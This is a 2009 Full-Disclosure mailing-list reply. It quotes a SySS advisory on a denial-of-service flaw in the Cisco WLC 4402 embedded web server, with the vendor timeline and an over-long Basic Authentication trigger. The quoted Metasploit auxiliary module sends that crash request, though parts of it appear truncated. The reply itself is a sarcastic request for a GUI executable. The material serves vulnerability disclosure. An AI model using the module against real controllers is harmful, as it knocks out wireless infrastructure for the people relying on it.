[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Cisco WLC 4402 Denial-of-Service vulnerability

that was a crappy disclosure. 

where is the .exe file with the gui?

at least make it in visual basic so i can have an interface

just send it to me in a zip

then itll be useful to the intelligence community

n3td3v / antisec

On Sun, 26 Jul 2009 09:17:52 -0500 SySS security advisories -- 
Christoph Bott <advisories@xxxxxxxxxxxx> wrote:
>Vulnerable Product: Cisco WLC 4402 (most likely among many others)
>Vulnerability discovered: January 2009
>Reported to vendor: Jan 01, 2009
>Fix available: not yet
>+ 01/11/2009: discovered vulnerability on a customer's site
>+ 01/13/2009: initial vendor contact via psirt@xxxxxxxxx
>+ 01/14/2009: vendor opened PSIRT case ID PSIRT-1018301631
>+ 02/09/2009: vendor states, that bugfix is _not_ contained within
>+ 03/30/2009: vendor states: "We have a fix  for this issue. 
>due to some other issues we are investigating we may not make this
>public until about 42 days."
>+ 06/02/2009: vendor states: "I really apologize for the delay on
>publishing this advisory. The reason that we have not publish is 
>we are also incorporating other security fixes within all the 
>releases. We WILL be publishing the advisory on July 8th, 2009 at 
>1600 UTC."
>+ 07/24/2009: Customer agreed with full disclosure
>+ 07/26/2009: Still no fixes available; full disclosure due to 
>vendor activities.
>The Cisco WLC 4402 is a Wireless LAN Controller, which is 
>manageable via
>an integrated embedded webserver (emweb httpd).
>The vulnerability described below could have been verified on WLC 
>software release However, since the vulnerability 
>affects the
>integrated embedded emweb http daemon, several other products 
>software releases might be affected, too.
>Using long, random authentication data, the embedded web server 
>can be
>crashed, which leeds to a device reboot. Subsequently repeated 
>lead to a permanent denial of service of the WLC (and therefore of 
>whole wireless infrastructure).
>Not needed.
>One only has to call
>and provide Basic Authentication data which uses
>a username and password longer than 63 characters each.
>The following header worked for me:
>Authorization: Basic
>The following code snippet can be used as a module within the 
>---- snip -----
>require 'msf/core'
>class Metasploit3 < Msf::Auxiliary
>        include Msf::Exploit::Remote::Tcp
>        include Msf::Auxiliary::Dos
>        def initialize(info = {})
>                super(update_info(info,
>                        'Name'           => 'Cisco WLC 4200 Basic 
>Denial of Service',
>                        'Description'    => %q{
>                                This module triggers a Denial of 
>condition in the Cisco WLC 4200
>                                HTTP server. By sending a GET 
>with long authentication data, the
>                                device becomes unresponsive and 
>Firmware is reportedly vulnerable.
>                        },
>                        'Author'                => [ 'Christoph 
><msf[at]bott.syss.de>' ],
>                        'License'        => MSF_LICENSE,
>                        'Version'        => '$Revision: 5949 $',
>                        'References'     =>
>                                [
>                                        [ 'BID', '???'],
>                                        [ 'CVE', '???'],
>                                        [ 'URL',
>                                ],
>                        'DisclosureDate' => 'January 26 2009'))
>                register_options(
>                        [
>                                Opt::RPORT(80),
>                        ], self.class)
>        end
>        def run
>                connect
>                print_status("Sending HTTP DoS packet")
>                sploit =
>                        "GET /screens/frameset.html HTTP/1.0\r\n" 
>                        "Authorization: Basic
>                sock.put(sploit + "\r\n")
>                disconnect
>        end
>---- snip ----
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/